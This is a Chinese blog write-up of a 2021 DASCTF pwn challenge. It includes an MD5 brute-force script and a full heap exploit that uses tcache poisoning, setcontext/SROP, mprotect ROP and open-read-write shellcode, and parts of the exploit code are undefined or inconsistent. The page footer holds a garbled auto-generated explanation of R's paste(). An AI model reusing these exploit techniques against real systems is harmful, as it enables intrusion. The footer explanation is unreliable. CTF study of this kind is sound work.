2021 DASCTF Sept X 浙江工业大学秋季挑战赛 pwn datasystem

最新推荐文章于 2023-02-09 09:18:27 发布
最新推荐文章于 2023-02-09 09:18:27 发布
阅读量368 收藏 1
点赞数 2
分类专栏: CTF 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yongbaoii/article/details/120479591
版权

在这里插入图片描述

在这里插入图片描述
开了沙箱。

在这里插入图片描述
看到两个特征数的时候显然知道是md5了,密码需要md5.

在我们输入0x20个字符的时候这里会有一个off by null。会把密码的最后要比较的mf5的第一个字节覆盖成’\x00’.
有一个off by null的漏洞。

所以导致我们如果输入的md5第一个字节可以最后是’\x00’,那么将会直接绕过检查。
所以我们就爆破一下。

import hashlib
import string
import itertools

target_c = '00'

for i in range(8):
        print(i)
        for mes in itertools.product(string.ascii_letters, repeat=i):
                if hashlib.md5((''.join(mes)).encode()).hexdigest().startswith(target_c):
                        print(''.join(mes))
                        exit()

最后发现输入gB就可以了。

进入堆部分
在这里插入图片描述add可以直接溢出。
snprintf试图写入0x500个字符,但是不允许,所以v3会直接变成0x500,就可以直接溢出。

exp

from pwn import*

context.log_level='debug'
context.arch='amd64'
context.os = "linux"
context.terminal = ["tmux", "splitw", "-h"] 

local = 1
if local:
    r = process('./datasystem')
else:
    r = remote("node4.buuoj.cn", 25963)
    

sa = lambda s,n : r.sendafter(s,n)
sla = lambda s,n : r.sendlineafter(s,n)
sl = lambda s : r.sendline(s)
sd = lambda s : r.send(s)
rc = lambda n : r.recv(n)
ru = lambda s : r.recvuntil(s)
ti = lambda: r.interactive()
lg = lambda name,addr :log.success(name+":"+hex(addr))

def debug():
    gdb.attach(r)
    pause()


sa("please input username: ", "admin")
sa("please input password: ", "gB" + '\x00' * 0x1e)


menu = ">> :"

def add(size, content):
    sla(menu, str(_add))
    sla("Size:", str(size))
    sa("Content:", content)

def edit(idx, content):
    sla(menu, str(_edit))
    sla("Index:", str(idx))
    sa("Content:", content)

def free(idx):
    sla(menu, str(_free))
    sla("Index:", str(idx))

def show(idx):
    sla(menu, str(_show))
    sla("Index:", str(idx))




add(0x10, 'a' * 0x10)   
add(0x430, 'a')
add(0x10, 'a')
free(1)

free(0)
add(0x10, 0x20 * 'a')  
show(0)

malloc_hook = (u64(ru('\x7f')[-6:] + '\x00\x00') & 0xFFFFFFFFFFFFF000) + (libc.sym['__malloc_hook'] & 0xFFF)
libc_base = malloc_hook - libc.sym['__malloc_hook']
free_hook = libc_base + libc.sym["__free_hook"]
system_addr = libc_base + libc.sym["system"]
setcontext_door = libc_base + libc.sym['setcontext'] + 53
lg("libc_base", libc_base)

free(0)
add(0x10, 0x10 * 'a' + p64(0) + p64(0x441))  

add(0x40, 'a') 
add(0x40, 'a') 
add(0x40, 'a') 

free(4)
free(3)

free(1)
add(0x40, 0x40 * 'a' + p64(0) + p64(0x51) + p64(__free_hook))    # 1


fake_rsp = free_hook & 0xfffffffffffff000
frame = SigreturnFrame()
frame.rax = 0
frame.rdi = 0
frame.rsi = fake_rsp
frame.rdx = 0x2000
frame.rsp = fake_rsp
frame.rip = syscall

add(0x40, 'a')  # 3
add(0x40, p64(setcontext_door))  # 4

add(len(str(frame)), str(frame)) # 5
free(5)

layout = [
libc_base+libc.search(asm("pop rdi\nret")).next(), 
free_hook & 0xfffffffffffff000,
libc_base+libc.search(asm("pop rsi\nret")).next(), 
0x2000,
libc_base+libc.search(asm("pop rdx\nret")).next(), 
7,
libc_base+libc.search(asm("pop rax\nret")).next(), 
10,
syscall,
libc_base+libc.search(asm("jmp rsp")).next(), 
]

shellcode = asm('''
    sub rsp, 0x800
    push 0x67616c66
    mov rdi, rsp
    xor esi, esi
    mov eax, 2
    syscall

    cmp eax, 0
    js failed

    mov edi, eax
    mov rsi, rsp
    mov edx, 0x100
    xor eax, eax
    syscall

    mov edx, eax
    mov rsi, rsp
    mov edi, 1
    mov eax, edi
    syscall

    jmp exit

    failed:
    push 0x6c696166
    mov edi, 1
    mov rsi, rsp
    mov edx, 4
    mov eax, edi
    syscall

    exit:
    xor edi, edi
    mov eax, 231
    syscall
    ''')

sd(flat(layout) + shellcode)

r.interactive()
yongbaoii
关注
专栏目录
DASCTF Sept X 浙江工业大学秋季挑战赛 Misc Girlfriend‘s account
Le1a's Blog
09-26 334
Girlfriend’s account 下载附件,得到一个excel表格,打开得到 flag{账单总金额四舍五入保留至小数点后两位},例如总金额为 543.21 元时,你需要提交 flag{543.21} 也就是说这个excel是个账单,不仅有商品单价,还有购买商品的数量,flag就是计算账单的总额,也就是算他女朋友花了多少钱,然后保留两位小数。 excel有函数可以计算乘法跟求和,但是这里并不是阿拉伯数字,所以我们接下来要做的就是把这个人民币的中文大写数字给转为阿拉伯数字 。百度上查阅一下 百度知道链
pwnDASCTF Sept 九月赛
woodwhale的博客
09-26 3735
pwnDASCTF Sept 月赛 1、hehepwn 先查看保护,栈可执行,想到shellcode 这题需要注意shellcode的写法 拖入ida中分析 一直以为iso scanf不能栈溢出,后来发现我是shabi 先进入sub_4007F9()函数 有个read函数,恰好读完s数组,由于printf是碰到\x00截断,所以如果我们输满0x20个padding就可以读取一个栈地址 我们可以把shellcode写入scanf输入的地址中,通过创建fake rbp进行栈迁移,而这个栈中存有我们写入
DASCTF Sept X 浙江工业大学秋季挑战赛
zylxixixi的博客
10-17 453
hehepwn 首先check一下安全防护机制,全红。 分析程序,程序逻辑非常简单。 思路首先通过strdup泄露栈地址,后面控制返回地址到栈上,执行shellcode。 from pwn import * sh = process('./bypwn') context(os='linux',arch='amd64',log_level='DEBUG') #sh = remote('node4.buuoj.cn',25111) pop_rdi = 0x000000000040092..
2021 DASCTF Sept X 浙江工业大学秋季挑战赛 pwn hahapwn
yongbaoii的博客
09-27 261
有个strdup要注意一下。 有溢出。 通过strdup泄露栈地址,栈上布置shellcode,跳过去就好啦 exp from pwn import* context.log_level='debug' context.arch='amd64' context.os = "linux" context.terminal = ["tmux", "splitw", "-h"] local = 1 if local: r = process('./1111111') else: r = re
DASCTF Sept X 浙江工业大学秋季挑战赛rsa1
a5555678744的博客
09-26 905
这道题其实比较经典,最早应该是出现在2016的HCTF,出题的思路可以参照这篇博客 2016 HCTF Crypto 出题总结 #! /usr/bin/env python # -*- coding: utf-8 -*- # from flag import get_flag from hashlib import sha512 import random from Crypto.Util.number import long_to_bytes, getPrime, bytes_to_long f
DASCTF Sept X 浙江工业大学秋季挑战赛 部分wp
Airwooh的博客
09-25 1664
排名28,还是太菜了,web就出了一道,eur1ka yyds MISC Girlfriend’s account import re import xlrd data=xlrd.open_workbook("D:\webtest\information.xls") table = data.sheets()[0] nrows = table.nrows price=table.col_values(0, start_rowx=1, end_rowx=5001) number=table.col.
TCG_PCClient_PP_1p3_for_Library_1p59_pub_29sept2021.pdf
07-21
TPM 相关技术规范 TPM(Trusted Platform Module,信任平台模块)是 Trusted Computing Group(TCG)制定的一个安全标准,旨在保护计算机系统中的敏感数据和应用程序。TPM 是一个hardware-based安全解决方案,能够...
AMD - AMD64 Programmer's Manual - Volume 2 - System Programming - Rev 3.30 - Sept 2018 (24593)-计算机科学
04-22
System ProgrammingPublication No. Revision Date 24593 3.30 September 2018:copyright: 2013 – 2018 Advanced Micro Devices Inc. All rights reserved.The information contained herein is for informational ...
第四届“泰迪杯”全国数据挖掘挑战赛成功举办.pdf
07-14
在所提供的文件内容中,我们可以看到一些关键信息和数据,它们暗示了第四届“泰迪杯”全国数据挖掘挑战赛的一些背景资料和具体细节。尽管文档的内容存在由于OCR技术识别错误而产生的混乱,我们仍然可以提取一些有用...
DASCTF Sept X 浙江工业大学秋季挑战赛 hellounser
Tajang的大千世界
02-09 251
我傻逼,当时没做出来,赛后看wp才理解,正则也要复习复习了
[DASCTF Sept X 浙江工业大学秋季挑战赛]hellounser
cosmoslin的博客
09-28 603
hellounser <?php class A { public $var; public function show(){ echo $this->var; } public function __invoke(){ $this->show(); } } class B{ public $func; public $arg; public function show(){
DASCTF Sept X 浙江工业大学秋季挑战赛 web
weixin_43610673的博客
09-26 856
hellounser <?php class A { public $var; public function show(){ echo $this->var; } public function __invoke(){ $this->show(); } } class B{ public $func; public $arg; public function __toString(
菜鸡的DASCTF Sept X 浙江工业大学秋季挑战赛WP
克格莫(有需要的私信)
09-25 1342
1.签到 题目: #!/usr/bin/env python # -*- coding: utf-8 -*- from Crypto.Util.number import * import random flag=b'flag{******************}' n = 2 ** 256 e=bytes_to_long(flag) m = random.randint(2, n-1) | 1 c = pow(m, e, n) #m mod(e)n print('m = ' + str(m)) prin
[DASCTF-Sept-X] 双目失明,身残志坚
西电卢本伟的博客
04-28 1094
MISC、盲水印攻击
ctf简单例题
qq_64553002的博客
05-12 346
如图得到flag 打开文本编译器查找flag 得到 flag{75a3d68bf071ee188c418ea6cf0bb043}
CTF web题总结--LFI
bob的博客
08-30 8723
本地文件包含漏洞(Local File Include),是php的include()函数存在设计缺陷,学习链接:php文件包含漏洞总结 题目的url都是类似这种:http://127.0.0.1/web500/index.php?action=front&mode=index http://127.0.0.1/web500/index.php?action=front&mode=newnote
CTF隐写总结!
YICONGITSME的博客
08-06 1万+
这个暑假在学安全,应对一个比赛。实验室朋友在一起学习,专攻自己的方向,相互帮助,讲解。主要是做CTF题, 我之前学过一些web的,sql注入挺让我头疼的,一次又一次的挫败。我这次先入手了隐写,学的也不是很深。下面是做的一些笔记,也是很全,也不是很好。 0x00 jpg文件头 十六进制FF D8 FF E0 cool edit 音频编辑 https://pc.qq.com/deta...
锻炼思维小题目
热门推荐
拥抱变化
03-15 2万+
第一章 假设法   一个真实的假设往往可以让事实呈现眼前,让真理浮出水面。一个人如果做什么事都可以让其思维以这些假设前提为基础,那么他便能真真正正地活在NLP里而不会陷入困境,他的人生也就会有更大地进步和提升。   初级题:   1.如何问问题?   有甲、乙两人,其中,甲只说假话,而不说真话;乙则是只说真话,不说假话。但是,他们两个人在回答别人的问题时,只通过点头与摇头来表示
CTF日常
qq_44632427的博客
01-17 517
常见MISC解题之二目前主要以BUUCTF平台的为例LSB 目前主要以BUUCTF平台的为例 通过这些题型总结一些常见的misci解题套路 LSB 这个题目,是一个LSB隐写。 下载题目,得到一张图片: 从题目的名字,大致就往LSB隐写的方向去考虑。用Stegsolve打开,发现在通道为0的时候,出现了 ...
r语言中paste(la," ",pct,"%",sept="")各参数的意义
最新发布
08-17
在R语言中,paste()函数用于将多个对象连接为一个字符串。在你提供的例子中,paste(la," ",pct,"%",sept="")的各参数的意义如下: - la: 这是一个字符向量或者一个对象,表示需要连接的第一个对象。 - " ": 这是一个字符串,表示需要添加到连接对象之间的分隔符。在这个例子中,它表示将la和pct之间用一个空格分隔。 - pct: 这是一个字符向量或对象,表示需要连接的第二个对象。 - "%": 这是一个字符串,表示需要添加到连接对象之间的分隔符。在这个例子中,它表示将pct和sept之间用一个百分号分隔。 - sept: 这是一个字符串,表示在连接对象之间的分隔符。在这个例子中,它表示在最后一个连接对象之后没有分隔符。 因此,paste(la," ",pct,"%",sept="")的作用是将la和pct连接为一个字符串,并在它们之间用一个空格分隔,然后在pct和sept之间用一个百分号分隔。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [R语言管道符(%>%)及占位(.)的简单介绍](https://blog.csdn.net/weixin_46128755/article/details/125989703)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值